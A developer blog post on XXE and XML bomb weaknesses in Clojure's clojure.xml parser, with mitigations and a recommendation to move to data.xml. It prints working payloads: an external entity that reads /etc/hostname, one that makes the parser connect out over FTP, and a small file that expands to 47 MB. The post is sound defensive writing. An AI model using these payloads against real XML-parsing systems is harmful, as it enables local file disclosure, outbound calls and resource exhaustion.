clojure.xml and untrusted input

Clojure’s standard library includes the namespace clojure.xml, which implements an XML parser. It’s not used much – which is great, because it’s vulnerable to XML external entity (XXE) attacks. It’s something that you want to be aware of if you’re using clojure.xml to process untrusted input.

Update (2022-03-27): XXE processing has been disabled in Clojure 1.11.0.

Juha Jokimäki already tweeted about this back in 2014. However, I still see clojure.xml used occasionally, so I thought it would be a good idea to blog about it.

Note: clojure.xml is not to be confused with data.xml, which is a separate library. data.xml has disabled XXE by default.

XML external entity attacks

XML external entities allow you to refer to resources outside of the file that you’re processing. For example, you can include the content of an external file. Here’s an example from OWASP:

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/hostname" >]>
<foo>&xxe;</foo>

Let’s try it out:

;; I saved the example above as "hostname.xml"
(require 'clojure.xml '[clojure.java.io :as io])
(with-open [input (io/input-stream "hostname.xml")]
  (clojure.xml/parse input))
;; => {:tag :foo, :attrs nil, :content ["nixos\n"]}

My laptop’s hostname is nixos, so that checks out!

If you point the file:/// reference to a directory instead of a file, you get a listing of the directory contents. In principle, you could use http:// URLs too, but that did not work on my machine.

If you use a domain name in the file:// URL, Java tries to connect to it over FTP.

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file://quanttype.net" >]>
<foo>&xxe;</foo>

You might be able to exfiltrate data using this mechanism. At the very least, it’s a way to call home, and if your FTP server is suitably broken, the parser seems to get stuck forever.

XML bombs

Juha Jokimäki’s example code also demonstrates a small XML bomb. An XML bomb is a short XML file that gets expanded to an extremely large one when processed.

Luckily, the JDK defines some limits on entity expansion to hinder this attack. The Wikipedia article has an example with a billion-fold expansion, but the JDK limits the number of entity expansions to 64,000 by default.

Thus, the Wikipedia example does not work, but here’s a 1.4 KB file that gets expanded to 47 megabytes:

<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol0 "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000">
 <!ENTITY lol1 "&lol0;&lol0;&lol0;&lol0;&lol0;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
]>
<lolz>&lol5;</lolz>

Let’s try it:

;; Save the example above as "lol.xml"
(with-open [input (io/input-stream "lol.xml")]
  (-> (clojure.xml/parse input) (:content) (first) (count)))
;; => 50000000

(/ 50000000 1024.0 1024.0)
;; => 47.6837158203125
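
As a rough sanity check on these numbers, here’s a sketch that counts how often each entity in lol.xml gets referenced. It assumes that lol0 is 1,000 characters long (which is what the 50,000,000 result above implies) and that the JDK limit counts every entity reference that gets expanded. The names fan-outs and reference-counts are made up for this illustration.

```clojure
;; How many references to the next-lower entity each entity contains,
;; from lol5 down to lol1 (lol1 refers to lol0 only 5 times).
(def fan-outs [10 10 10 10 5])

;; How often each entity ends up being referenced:
;; lol5 once, lol4 10 times, ..., lol0 50,000 times.
(def reference-counts (reductions * 1 fan-outs))
;; => (1 10 100 1000 10000 50000)

;; Total number of entity references that get expanded.
(reduce + reference-counts)
;; => 61111

;; Size of the result, assuming lol0 holds 1,000 characters.
(* (last reference-counts) 1000)
;; => 50000000
```

If those assumptions hold, the document stays just under the default limit of 64,000 while still producing a 50,000,000-character string.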

It’s not catastrophic: a single XML document won’t crash your server. Still, you might want to think about it if you process XML files from untrusted sources.

Workaround

Juha Jokimäki shows how to create a parser that disallows the document type declarations (DTDs) required by the attacks above:

(defn startparse-sax-no-doctype [s ch]
  (..
    (doto (javax.xml.parsers.SAXParserFactory/newInstance)
      (.setFeature javax.xml.XMLConstants/FEATURE_SECURE_PROCESSING true)
      (.setFeature "http://apache.org/xml/features/disallow-doctype-decl" true))
    (newSAXParser)
    (parse s ch)))
    
(with-open [input (io/input-stream "hostname.xml")]
  (clojure.xml/parse input startparse-sax-no-doctype))
;; Execution error (SAXParseException) at com.sun.org.apache.xerces.internal.util.ErrorHandlerWrapper/createSAXParseException (ErrorHandlerWrapper.java:204).
;; DOCTYPE is disallowed when the feature "http://apache.org/xml/features/disallow-doctype-decl" set to true.
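
If you have to accept documents that contain a DOCTYPE, a less strict variant might be to keep DTDs enabled and turn off only external entities. The sketch below is not from Juha Jokimäki’s example: it uses the two standard SAX feature names for external general and parameter entities, which OWASP’s XXE guidance also suggests, and the function name startparse-sax-no-external-entities is made up here. I’d treat it as a starting point to test against your own JDK rather than as a guarantee.

```clojure
(require 'clojure.xml '[clojure.java.io :as io])

;; Hypothetical variant of the parser above: the DOCTYPE is still accepted,
;; but the parser is told not to resolve external entities.
(defn startparse-sax-no-external-entities [s ch]
  (..
    (doto (javax.xml.parsers.SAXParserFactory/newInstance)
      (.setFeature javax.xml.XMLConstants/FEATURE_SECURE_PROCESSING true)
      (.setFeature "http://xml.org/sax/features/external-general-entities" false)
      (.setFeature "http://xml.org/sax/features/external-parameter-entities" false))
    (newSAXParser)
    (parse s ch)))

;; It is passed to clojure.xml/parse the same way as startparse-sax-no-doctype.
(comment
  (with-open [input (io/input-stream "hostname.xml")]
    (clojure.xml/parse input startparse-sax-no-external-entities)))
```

Note that internal entities still get expanded with this setup, so it does nothing against XML bombs beyond the JDK’s default limits.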

However, my recommendation is to replace clojure.xml with data.xml. It has a couple of benefits:

  • It has a nice, full-featured interface.
  • The parse tree it produces is similar to the one produced by clojure.xml, so for many users it’s a drop-in replacement.
  • It’s part of the Clojure contrib library suite, so it’s widely used and maintained.

XXE processing is disabled by default:

;; clj -Sdeps '{:deps {org.clojure/data.xml {:mvn/version "0.2.0-alpha6"}}}'
(require 'clojure.data.xml)
(with-open [input (io/input-stream "hostname.xml")]
  (clojure.data.xml/parse input))
;; => #xml/element{:tag :foo}

XML bombs are subject to the same limits as with clojure.xml, since both libraries use the JDK’s XML parsing facilities. If you want to prevent them altogether, you can disable DTDs by setting :support-dtd false:

(with-open [input (io/input-stream "lol.xml")]
  (clojure.data.xml/parse input :support-dtd false))
;; Error printing return value (XMLStreamException) at com.sun.org.apache.xerces.internal.impl.XMLStreamReaderImpl/next (XMLStreamReaderImpl.java:652).
;; ParseError at [row,col]:[11,13]
;; Message: The entity "lol5" was referenced, but not declared.

Update: As a follow-up, see CLJ-2611, which aims to disable XXE processing in clojure.xml.

